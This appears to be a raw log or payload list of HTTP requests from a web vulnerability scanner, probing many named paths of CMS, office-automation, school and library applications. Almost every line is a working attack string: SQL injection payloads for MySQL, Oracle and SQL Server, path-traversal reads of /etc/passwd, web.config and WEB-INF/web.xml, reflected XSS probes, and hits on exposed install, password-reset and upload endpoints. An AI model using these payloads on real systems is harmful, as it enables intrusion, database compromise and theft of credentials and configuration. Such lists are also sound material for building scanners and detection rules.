GET /getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
GET /getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
GET /MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
GET /install/install.php.lock?step=2
GET /cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
GET /getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
HEAD /web.config.file.aspx
GET /wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
POST /information/changeState.asp
POST /MessageList.asp?action=search
POST /bangong/GroupInforDo.asp
POST /bangong/ShortCutInforDo.asp
HEAD /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
GET /shownews.aspx?newsno=-1'%20and%201=char(106)%20--
GET /nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
POST /ratercp.php?action=savepassword
GET /admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
POST /admincp.php?action=constructionresults&todo=del
POST /admincp.php?action=declarepublish&todo=del
GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
GET /index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /index.php?action=search&todo=site
GET /index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
POST /include/upload.inc.php
POST /admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
POST /admincp.php?action=vote&todo=savevote
GET /admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
POST /admincp.php?action=/../teach/sitebook&id=1
GET /seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
GET /complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
GET /list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
POST /index_communicate.php
GET /file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
GET /pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
GET /pub/search/default.asp?id=-1/**/and/**/1=char(106)--
GET /pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
GET /index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
HEAD /DownLoad.aspx?mu=../&fn=web.config&newname=web.config
GET /faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
GET /NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
GET /WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
POST /pt/edu/stuTransfer.aspx
GET /NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
GET /news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
GET /news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
GET /allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /download2.aspx?fn=../web.config
HEAD /DownLoad.aspx?Accessory=../index.aspx
POST /mod/news/qianshoucount.php
POST /mod/card/quest.php?op=get_m
POST /mod/home/quest.php?op=get_group_list
GET /NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
GET /NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
GET /js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
HEAD /ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
GET /news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
GET /ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
GET /jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
POST /scrp/book.cfm?sKeyword=1&sFieldName=bname
GET /main/
GET /asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
GET /getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
GET /install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
GET /module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
GET /myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
POST /Logon?action=logon
GET /UserSecurityController.do?method=getPassword&step=2&userName=admin
GET /webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
HEAD /common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
GET /OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
GET /showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
POST /general/crm/apps/crm/include/import/export.php
GET /Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
GET /Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
HEAD /admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
GET /cms/conf/system.xml
POST /erp/reportmanage/taskreport/lljinduadd.aspx
POST /oa/erp/SalePlan/YearPlanAdd.aspx
GET /oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
GET /oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
GET /oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
HEAD /downTemp.aspx?type=downDb&fileName=../web.config
GET /showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
GET /showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
GET /cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
GET /datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
GET /user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
GET /admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
GET /admin/manage.jsp
GET /shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
GET /content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
POST /mod/shop/quest/ajax.php?op=auction_buy
GET /wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
GET /news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
POST /mod/payment/quest.php?op=check&page=b2b
POST /mod/ntga/jwsview.php
POST /uploadd.php
GET /jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
GET /admin/backup.aspx
POST /mod/mad/video_upload.php
GET /business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
GET /SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
GET /Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
POST /frontProduct/search.ac
GET /Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
GET /Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
GET /FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
GET /website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
GET /website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
GET /bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
GET /znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
GET /opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /cms/framework/dbfile/createdbfile.jsp
HEAD /CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
GET /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
GET /FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
GET /interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
GET /inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
GET /general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
GET /general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
GET /backup/backup/backup.asp
GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
HEAD /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
GET /admini/item/iteminfo.aspx
GET /admini/newstopic/newstopicinfo.aspx
HEAD /download?fileName=/WEB-INF/web.xml
GET /RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
POST /index_lnlqcj.php
GET /main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
GET /scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
POST /information/OA_InforList.asp
GET /information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
POST /information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
POST /public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
POST /public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
GET /jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
GET /jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
GET /caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
GET /MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
POST /mailClassInfor.asp
GET /MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
GET /Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
HEAD /jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
GET /tophp.asp
POST /Manage/CalendarMemo/event.ashx
GET /RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
GET /SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
GET /SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
GET /workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
GET /SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
GET /SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
GET /resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
